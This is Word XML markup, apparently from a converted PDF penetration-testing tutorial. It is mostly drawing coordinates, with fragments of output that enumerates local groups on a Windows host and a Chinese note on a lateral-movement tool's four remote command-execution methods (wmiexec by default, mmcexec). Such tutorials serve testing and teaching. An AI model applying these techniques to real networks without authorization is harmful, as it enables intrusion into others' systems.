6417,13661,6417,13660,6417,13658,6417,13657,6417,13656,6417,13654,6417,13653,6417,13651,6417,13650,6417,13648,6417,13647,6417,13645,6417,13643,6417,13641,6417,13639,6417,13637,6417,13635,6417,13633,6417,13631,6417,13629,6417,13627,6417,13624,6417,13622,6417,13620,6417,13617,6417,13614,6417,13612,6417,13609,6417,13606,6417,13603,6417,13600,6417,13597,6417,13594,6417,13591,6417,13588,6417,13585,6417,13581,6417,13578,6417,13574,6417,13571,6417,13567,6417,13563,6417,13559,6417,13555,6417,13551,6417,13547,6417,13543,6417,13538,6417,13534,6417,13529,6417,13525,6417,13520,6417,13515,6417,13511,6417,13506,6417,13501,6417,13495,6417,13490,6417,13485,6417,13479,6417,13474,6417,13468,6417,13462,6417,13457,6417,13451,6417,13445,6417,13438,6417,13432,6417,13426e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:688.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,13770" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:13770;width:130;height:270" coordorigin="4710,13770" coordsize="130,270" path="m4736,13786l4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4736,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4737,13786,4738,13786,4738,13786,4738,13786,4738,13786,4738,13786,4739,13786,4739,13786,4739,13786,4739,13786,4739,13786,4740,13786,4740,13786,4740,13786,4741,13786,4741,13786,4741,13786,4742,13786,4742,13786,4742,13786,4743,13786,4743,13786,4744,13786,4744,13786,4745,13786,4745,13786,4746,13786,4746,13786,4747,13786,4748,13786,4748,13786,4749,13786,4750,13786,4750,13786,4751,13786,4752,13786,4753,13786,4753,13786,4754,13786,4755,13786,4756,13786,4757,13786,4758,13786,4759,13786,4760,13786,4761,13786,4762,13786,4763,13786,4764,13786,4765,13786,4766,13786,4768,13786,4769,13786,4770,13786,4772,13786,4773,13786,4774,13786,4776,13786,4777,13786,4779,13786,4780,13786,4782,13786,4783,13786,4785,13786,4787,13786,4788,13786,4790,13786,4792,13786,4794,13786,4796,13786,4797,13786,4799,13786,4801,13786,4803,13786,4806,13786,4808,13786,4810,13786,4812,13786,4814,13786,4817,13786,4819,13786,4821,13786,4824,13786,4826,13786,4829,13786,4831,13786,4834,13786,4836,13786,4839,13786,4842,13786,4845,13786,4848,13786,4850,13786,4853,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13786,4856,13787,4856,13787,4856,13787,4856,13787,4856,13787,4856,13787,4856,13788,4856,13788,4856,13788,4856,13788,4856,13789,4856,13789,4856,13789,4856,13790,4856,13790,4856,13790,4856,13791,4856,13791,4856,13792,4856,13792,4856,13793,4856,13794,4856,13794,4856,13795,4856,13796,4856,13796,4856,13797,4856,13798,4856,13799,4856,13800,4856,13801,4856,13802,4856,13803,4856,13804,4856,13805,4856,13806,4856,13807,4856,13808,4856,13810,4856,13811,4856,13813,4856,13814,4856,13815,4856,13817,4856,13819,4856,13820,4856,13822,4856,13824,4856,13826,4856,13828,4856,13829,4856,13831,4856,13834,4856,13836,4856,13838,4856,13840,4856,13842,4856,13845,4856,13847,4856,13850,4856,13852,4856,13855,4856,13858,4856,13861,4856,13863,4856,13866,4856,13869,4856,13873,4856,13876,4856,13879,4856,13882,4856,13886,4856,13889,4856,13893,4856,13896,4856,13900,4856,13904,4856,13908,4856,13912,4856,13916,4856,13920,4856,13924,4856,13928,4856,13933,4856,13937,4856,13942,4856,13947,4856,13951,4856,13956,4856,13961,4856,13966,4856,13971,4856,13977,4856,13982,4856,13987,4856,13993,4856,13999,4856,14004,4856,14010,4856,14016,4856,14022,4856,14028,4856,14035,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4856,14041,4855,14041,4855,14041,4855,14041,4855,14041,4855,14041,4855,14041,4855,14041,4854,14041,4854,14041,4854,14041,4854,14041,4853,14041,4853,14041,4853,14041,4853,14041,4852,14041,4852,14041,4852,14041,4851,14041,4851,14041,4850,14041,4850,14041,4850,14041,4849,14041,4849,14041,4848,14041,4848,14041,4847,14041,4846,14041,4846,14041,4845,14041,4845,14041,4844,14041,4843,14041,4843,14041,4842,14041,4841,14041,4840,14041,4839,14041,4839,14041,4838,14041,4837,14041,4836,14041,4835,14041,4834,14041,4833,14041,4832,14041,4831,14041,4830,14041,4829,14041,4828,14041,4826,14041,4825,14041,4824,14041,4823,14041,4821,14041,4820,14041,4819,14041,4817,14041,4816,14041,4814,14041,4813,14041,4811,14041,4810,14041,4808,14041,4806,14041,4805,14041,4803,14041,4801,14041,4799,14041,4797,14041,4795,14041,4793,14041,4791,14041,4789,14041,4787,14041,4785,14041,4783,14041,4781,14041,4779,14041,4776,14041,4774,14041,4772,14041,4769,14041,4767,14041,4764,14041,4762,14041,4759,14041,4756,14041,4754,14041,4751,14041,4748,14041,4745,14041,4742,14041,4739,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14041,4736,14040,4736,14040,4736,14040,4736,14040,4736,14040,4736,14040,4736,14039,4736,14039,4736,14039,4736,14039,4736,14038,4736,14038,4736,14038,4736,14037,4736,14037,4736,14037,4736,14036,4736,14036,4736,14035,4736,14035,4736,14034,4736,14033,4736,14033,4736,14032,4736,14031,4736,14031,4736,14030,4736,14029,4736,14028,4736,14027,4736,14026,4736,14025,4736,14024,4736,14023,4736,14022,4736,14021,4736,14020,4736,14019,4736,14017,4736,14016,4736,14014,4736,14013,4736,14012,4736,14010,4736,14008,4736,14007,4736,14005,4736,14003,4736,14001,4736,13999,4736,13998,4736,13996,4736,13993,4736,13991,4736,13989,4736,13987,4736,13985,4736,13982,4736,13980,4736,13977,4736,13975,4736,13972,4736,13969,4736,13966,4736,13964,4736,13961,4736,13958,4736,13955,4736,13951,4736,13948,4736,13945,4736,13941,4736,13938,4736,13934,4736,13931,4736,13927,4736,13923,4736,13919,4736,13915,4736,13911,4736,13907,4736,13903,4736,13899,4736,13894,4736,13890,4736,13885,4736,13880,4736,13876,4736,13871,4736,13866,4736,13861,4736,13856,4736,13850,4736,13845,4736,13840,4736,13834,4736,13828,4736,13823,4736,13817,4736,13811,4736,13805,4736,13799,4736,13792,4736,13786e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:707.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,14150" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:14150;width:130;height:250" coordorigin="4710,14150" coordsize="130,250" path="m4736,14161l4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4736,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4737,14161,4738,14161,4738,14161,4738,14161,4738,14161,4738,14161,4739,14161,4739,14161,4739,14161,4739,14161,4739,14161,4740,14161,4740,14161,4740,14161,4741,14161,4741,14161,4741,14161,4742,14161,4742,14161,4742,14161,4743,14161,4743,14161,4744,14161,4744,14161,4745,14161,4745,14161,4746,14161,4746,14161,4747,14161,4748,14161,4748,14161,4749,14161,4750,14161,4750,14161,4751,14161,4752,14161,4753,14161,4753,14161,4754,14161,4755,14161,4756,14161,4757,14161,4758,14161,4759,14161,4760,14161,4761,14161,4762,14161,4763,14161,4764,14161,4765,14161,4766,14161,4768,14161,4769,14161,4770,14161,4772,14161,4773,14161,4774,14161,4776,14161,4777,14161,4779,14161,4780,14161,4782,14161,4783,14161,4785,14161,4787,14161,4788,14161,4790,14161,4792,14161,4794,14161,4796,14161,4797,14161,4799,14161,4801,14161,4803,14161,4806,14161,4808,14161,4810,14161,4812,14161,4814,14161,4817,14161,4819,14161,4821,14161,4824,14161,4826,14161,4829,14161,4831,14161,4834,14161,4836,14161,4839,14161,4842,14161,4845,14161,4848,14161,4850,14161,4853,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14161,4856,14162,4856,14162,4856,14162,4856,14162,4856,14162,4856,14162,4856,14162,4856,14163,4856,14163,4856,14163,4856,14163,4856,14164,4856,14164,4856,14164,4856,14164,4856,14165,4856,14165,4856,14166,4856,14166,4856,14167,4856,14167,4856,14168,4856,14168,4856,14169,4856,14169,4856,14170,4856,14171,4856,14172,4856,14172,4856,14173,4856,14174,4856,14175,4856,14176,4856,14177,4856,14178,4856,14179,4856,14180,4856,14181,4856,14182,4856,14184,4856,14185,4856,14186,4856,14188,4856,14189,4856,14191,4856,14192,4856,14194,4856,14196,4856,14197,4856,14199,4856,14201,4856,14203,4856,14205,4856,14207,4856,14209,4856,14211,4856,14213,4856,14215,4856,14218,4856,14220,4856,14222,4856,14225,4856,14228,4856,14230,4856,14233,4856,14236,4856,14239,4856,14242,4856,14245,4856,14248,4856,14251,4856,14254,4856,14257,4856,14261,4856,14264,4856,14268,4856,14272,4856,14275,4856,14279,4856,14283,4856,14287,4856,14291,4856,14295,4856,14299,4856,14304,4856,14308,4856,14313,4856,14317,4856,14322,4856,14327,4856,14331,4856,14336,4856,14341,4856,14347,4856,14352,4856,14357,4856,14363,4856,14368,4856,14374,4856,14380,4856,14385,4856,14391,4856,14397,4856,14404,4856,14410,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4856,14416,4855,14416,4855,14416,4855,14416,4855,14416,4855,14416,4855,14416,4855,14416,4854,14416,4854,14416,4854,14416,4854,14416,4853,14416,4853,14416,4853,14416,4853,14416,4852,14416,4852,14416,4852,14416,4851,14416,4851,14416,4850,14416,4850,14416,4850,14416,4849,14416,4849,14416,4848,14416,4848,14416,4847,14416,4846,14416,4846,14416,4845,14416,4845,14416,4844,14416,4843,14416,4843,14416,4842,14416,4841,14416,4840,14416,4839,14416,4839,14416,4838,14416,4837,14416,4836,14416,4835,14416,4834,14416,4833,14416,4832,14416,4831,14416,4830,14416,4829,14416,4828,14416,4826,14416,4825,14416,4824,14416,4823,14416,4821,14416,4820,14416,4819,14416,4817,14416,4816,14416,4814,14416,4813,14416,4811,14416,4810,14416,4808,14416,4806,14416,4805,14416,4803,14416,4801,14416,4799,14416,4797,14416,4795,14416,4793,14416,4791,14416,4789,14416,4787,14416,4785,14416,4783,14416,4781,14416,4779,14416,4776,14416,4774,14416,4772,14416,4769,14416,4767,14416,4764,14416,4762,14416,4759,14416,4756,14416,4754,14416,4751,14416,4748,14416,4745,14416,4742,14416,4739,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14416,4736,14415,4736,14415,4736,14415,4736,14415,4736,14415,4736,14414,4736,14414,4736,14414,4736,14414,4736,14413,4736,14413,4736,14413,4736,14412,4736,14412,4736,14411,4736,14411,4736,14410,4736,14410,4736,14409,4736,14409,4736,14408,4736,14407,4736,14407,4736,14406,4736,14405,4736,14404,4736,14403,4736,14402,4736,14402,4736,14401,4736,14400,4736,14398,4736,14397,4736,14396,4736,14395,4736,14394,4736,14392,4736,14391,4736,14390,4736,14388,4736,14387,4736,14385,4736,14384,4736,14382,4736,14380,4736,14378,4736,14377,4736,14375,4736,14373,4736,14371,4736,14369,4736,14367,4736,14364,4736,14362,4736,14360,4736,14357,4736,14355,4736,14352,4736,14350,4736,14347,4736,14344,4736,14342,4736,14339,4736,14336,4736,14333,4736,14330,4736,14327,4736,14323,4736,14320,4736,14317,4736,14313,4736,14310,4736,14306,4736,14302,4736,14298,4736,14294,4736,14291,4736,14286,4736,14282,4736,14278,4736,14274,4736,14269,4736,14265,4736,14260,4736,14256,4736,14251,4736,14246,4736,14241,4736,14236,4736,14231,4736,14226,4736,14220,4736,14215,4736,14209,4736,14204,4736,14198,4736,14192,4736,14186,4736,14180,4736,14174,4736,14168,4736,14161e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:725.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,14510" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:14510;width:130;height:250" coordorigin="4710,14510" coordsize="130,250" path="m4736,14521l4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4736,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4737,14521,4738,14521,4738,14521,4738,14521,4738,14521,4738,14521,4739,14521,4739,14521,4739,14521,4739,14521,4739,14521,4740,14521,4740,14521,4740,14521,4741,14521,4741,14521,4741,14521,4742,14521,4742,14521,4742,14521,4743,14521,4743,14521,4744,14521,4744,14521,4745,14521,4745,14521,4746,14521,4746,14521,4747,14521,4748,14521,4748,14521,4749,14521,4750,14521,4750,14521,4751,14521,4752,14521,4753,14521,4753,14521,4754,14521,4755,14521,4756,14521,4757,14521,4758,14521,4759,14521,4760,14521,4761,14521,4762,14521,4763,14521,4764,14521,4765,14521,4766,14521,4768,14521,4769,14521,4770,14521,4772,14521,4773,14521,4774,14521,4776,14521,4777,14521,4779,14521,4780,14521,4782,14521,4783,14521,4785,14521,4787,14521,4788,14521,4790,14521,4792,14521,4794,14521,4796,14521,4797,14521,4799,14521,4801,14521,4803,14521,4806,14521,4808,14521,4810,14521,4812,14521,4814,14521,4817,14521,4819,14521,4821,14521,4824,14521,4826,14521,4829,14521,4831,14521,4834,14521,4836,14521,4839,14521,4842,14521,4845,14521,4848,14521,4850,14521,4853,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14521,4856,14522,4856,14522,4856,14522,4856,14522,4856,14522,4856,14522,4856,14522,4856,14522,4856,14522,4856,14523,4856,14523,4856,14523,4856,14523,4856,14523,4856,14524,4856,14524,4856,14524,4856,14525,4856,14525,4856,14525,4856,14526,4856,14526,4856,14527,4856,14527,4856,14528,4856,14528,4856,14529,4856,14530,4856,14530,4856,14531,4856,14532,4856,14533,4856,14533,4856,14534,4856,14535,4856,14536,4856,14537,4856,14538,4856,14539,4856,14540,4856,14541,4856,14543,4856,14544,4856,14545,4856,14547,4856,14548,4856,14549,4856,14551,4856,14552,4856,14554,4856,14556,4856,14557,4856,14559,4856,14561,4856,14563,4856,14565,4856,14567,4856,14569,4856,14571,4856,14573,4856,14576,4856,14578,4856,14580,4856,14583,4856,14585,4856,14588,4856,14590,4856,14593,4856,14596,4856,14599,4856,14602,4856,14605,4856,14608,4856,14611,4856,14614,4856,14618,4856,14621,4856,14624,4856,14628,4856,14632,4856,14635,4856,14639,4856,14643,4856,14647,4856,14651,4856,14655,4856,14659,4856,14664,4856,14668,4856,14673,4856,14677,4856,14682,4856,14687,4856,14692,4856,14697,4856,14702,4856,14707,4856,14712,4856,14717,4856,14723,4856,14728,4856,14734,4856,14740,4856,14746,4856,14752,4856,14758,4856,14764,4856,14770,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4854,14776,4854,14776,4854,14776,4854,14776,4853,14776,4853,14776,4853,14776,4853,14776,4852,14776,4852,14776,4852,14776,4851,14776,4851,14776,4850,14776,4850,14776,4850,14776,4849,14776,4849,14776,4848,14776,4848,14776,4847,14776,4846,14776,4846,14776,4845,14776,4845,14776,4844,14776,4843,14776,4843,14776,4842,14776,4841,14776,4840,14776,4839,14776,4839,14776,4838,14776,4837,14776,4836,14776,4835,14776,4834,14776,4833,14776,4832,14776,4831,14776,4830,14776,4829,14776,4828,14776,4826,14776,4825,14776,4824,14776,4823,14776,4821,14776,4820,14776,4819,14776,4817,14776,4816,14776,4814,14776,4813,14776,4811,14776,4810,14776,4808,14776,4806,14776,4805,14776,4803,14776,4801,14776,4799,14776,4797,14776,4795,14776,4793,14776,4791,14776,4789,14776,4787,14776,4785,14776,4783,14776,4781,14776,4779,14776,4776,14776,4774,14776,4772,14776,4769,14776,4767,14776,4764,14776,4762,14776,4759,14776,4756,14776,4754,14776,4751,14776,4748,14776,4745,14776,4742,14776,4739,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14775,4736,14775,4736,14775,4736,14775,4736,14775,4736,14774,4736,14774,4736,14774,4736,14773,4736,14773,4736,14773,4736,14772,4736,14772,4736,14771,4736,14771,4736,14770,4736,14770,4736,14769,4736,14769,4736,14768,4736,14767,4736,14767,4736,14766,4736,14765,4736,14764,4736,14764,4736,14763,4736,14762,4736,14761,4736,14760,4736,14759,4736,14758,4736,14756,4736,14755,4736,14754,4736,14753,4736,14751,4736,14750,4736,14748,4736,14747,4736,14745,4736,14744,4736,14742,4736,14740,4736,14739,4736,14737,4736,14735,4736,14733,4736,14731,4736,14729,4736,14727,4736,14725,4736,14722,4736,14720,4736,14718,4736,14715,4736,14713,4736,14710,4736,14707,4736,14705,4736,14702,4736,14699,4736,14696,4736,14693,4736,14690,4736,14687,4736,14683,4736,14680,4736,14677,4736,14673,4736,14670,4736,14666,4736,14662,4736,14659,4736,14655,4736,14651,4736,14647,4736,14643,4736,14638,4736,14634,4736,14630,4736,14625,4736,14620,4736,14616,4736,14611,4736,14606,4736,14601,4736,14596,4736,14591,4736,14586,4736,14580,4736,14575,4736,14569,4736,14564,4736,14558,4736,14552,4736,14546,4736,14540,4736,14534,4736,14528,4736,14521e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:757.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,15150" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:15150;width:130;height:270" coordorigin="4710,15150" coordsize="130,270" path="m4736,15167l4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4738,15167,4738,15167,4738,15167,4738,15167,4738,15167,4739,15167,4739,15167,4739,15167,4739,15167,4739,15167,4740,15167,4740,15167,4740,15167,4741,15167,4741,15167,4741,15167,4742,15167,4742,15167,4742,15167,4743,15167,4743,15167,4744,15167,4744,15167,4745,15167,4745,15167,4746,15167,4746,15167,4747,15167,4748,15167,4748,15167,4749,15167,4750,15167,4750,15167,4751,15167,4752,15167,4753,15167,4753,15167,4754,15167,4755,15167,4756,15167,4757,15167,4758,15167,4759,15167,4760,15167,4761,15167,4762,15167,4763,15167,4764,15167,4765,15167,4766,15167,4768,15167,4769,15167,4770,15167,4772,15167,4773,15167,4774,15167,4776,15167,4777,15167,4779,15167,4780,15167,4782,15167,4783,15167,4785,15167,4787,15167,4788,15167,4790,15167,4792,15167,4794,15167,4796,15167,4797,15167,4799,15167,4801,15167,4803,15167,4806,15167,4808,15167,4810,15167,4812,15167,4814,15167,4817,15167,4819,15167,4821,15167,4824,15167,4826,15167,4829,15167,4831,15167,4834,15167,4836,15167,4839,15167,4842,15167,4845,15167,4848,15167,4850,15167,4853,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15168,4856,15168,4856,15168,4856,15168,4856,15168,4856,15168,4856,15169,4856,15169,4856,15169,4856,15170,4856,15170,4856,15170,4856,15171,4856,15171,4856,15172,4856,15172,4856,15173,4856,15173,4856,15174,4856,15174,4856,15175,4856,15176,4856,15176,4856,15177,4856,15178,4856,15179,4856,15180,4856,15180,4856,15181,4856,15182,4856,15183,4856,15184,4856,15186,4856,15187,4856,15188,4856,15189,4856,15190,4856,15192,4856,15193,4856,15195,4856,15196,4856,15198,4856,15199,4856,15201,4856,15203,4856,15205,4856,15206,4856,15208,4856,15210,4856,15212,4856,15214,4856,15216,4856,15219,4856,15221,4856,15223,4856,15226,4856,15228,4856,15231,4856,15233,4856,15236,4856,15238,4856,15241,4856,15244,4856,15247,4856,15250,4856,15253,4856,15256,4856,15260,4856,15263,4856,15266,4856,15270,4856,15273,4856,15277,4856,15281,4856,15285,4856,15288,4856,15292,4856,15296,4856,15301,4856,15305,4856,15309,4856,15314,4856,15318,4856,15323,4856,15327,4856,15332,4856,15337,4856,15342,4856,15347,4856,15352,4856,15357,4856,15363,4856,15368,4856,15374,4856,15379,4856,15385,4856,15391,4856,15397,4856,15403,4856,15409,4856,15415,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4854,15422,4854,15422,4854,15422,4854,15422,4853,15422,4853,15422,4853,15422,4853,15422,4852,15422,4852,15422,4852,15422,4851,15422,4851,15422,4850,15422,4850,15422,4850,15422,4849,15422,4849,15422,4848,15422,4848,15422,4847,15422,4846,15422,4846,15422,4845,15422,4845,15422,4844,15422,4843,15422,4843,15422,4842,15422,4841,15422,4840,15422,4839,15422,4839,15422,4838,15422,4837,15422,4836,15422,4835,15422,4834,15422,4833,15422,4832,15422,4831,15422,4830,15422,4829,15422,4828,15422,4826,15422,4825,15422,4824,15422,4823,15422,4821,15422,4820,15422,4819,15422,4817,15422,4816,15422,4814,15422,4813,15422,4811,15422,4810,15422,4808,15422,4806,15422,4805,15422,4803,15422,4801,15422,4799,15422,4797,15422,4795,15422,4793,15422,4791,15422,4789,15422,4787,15422,4785,15422,4783,15422,4781,15422,4779,15422,4776,15422,4774,15422,4772,15422,4769,15422,4767,15422,4764,15422,4762,15422,4759,15422,4756,15422,4754,15422,4751,15422,4748,15422,4745,15422,4742,15422,4739,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15420,4736,15420,4736,15420,4736,15420,4736,15419,4736,15419,4736,15419,4736,15418,4736,15418,4736,15418,4736,15417,4736,15417,4736,15416,4736,15416,4736,15415,4736,15415,4736,15414,4736,15413,4736,15413,4736,15412,4736,15411,4736,15411,4736,15410,4736,15409,4736,15408,4736,15407,4736,15406,4736,15405,4736,15404,4736,15403,4736,15402,4736,15400,4736,15399,4736,15398,4736,15397,4736,15395,4736,15394,4736,15392,4736,15391,4736,15389,4736,15387,4736,15386,4736,15384,4736,15382,4736,15380,4736,15378,4736,15376,4736,15374,4736,15372,4736,15370,4736,15368,4736,15365,4736,15363,4736,15360,4736,15358,4736,15355,4736,15353,4736,15350,4736,15347,4736,15344,4736,15341,4736,15338,4736,15335,4736,15332,4736,15329,4736,15325,4736,15322,4736,15319,4736,15315,4736,15311,4736,15308,4736,15304,4736,15300,4736,15296,4736,15292,4736,15288,4736,15284,4736,15279,4736,15275,4736,15270,4736,15266,4736,15261,4736,15256,4736,15251,4736,15247,4736,15241,4736,15236,4736,15231,4736,15226,4736,15220,4736,15215,4736,15209,4736,15203,4736,15197,4736,15192,4736,15185,4736,15179,4736,15173,4736,15167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86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12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.119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WIN03X64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Network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Configuration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Operators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memberc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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ount: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13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.119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WIN03X64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Performance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Log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Users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membercount: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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="145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14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.119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WIN03X64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Performance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Monitor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Users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membercount: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980053"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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15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9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.119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WIN03X64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Power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Users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membercount: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0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16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.119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WIN03X64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Print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Operators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membercount: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16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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17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.119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WIN03X64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Remote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Desktop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Users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membercount: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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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18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9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.119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WIN03X64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Replicator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membercount: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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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19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.119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WIN03X64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Users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membercount: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17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3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11" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分别支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4种执行Command，如无--exec-method执行，默认为wmiexec执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="77" w:after="0" w:line="241" w:lineRule="auto"/>
        <w:ind w:left="2307" w:right="8464" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mmc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
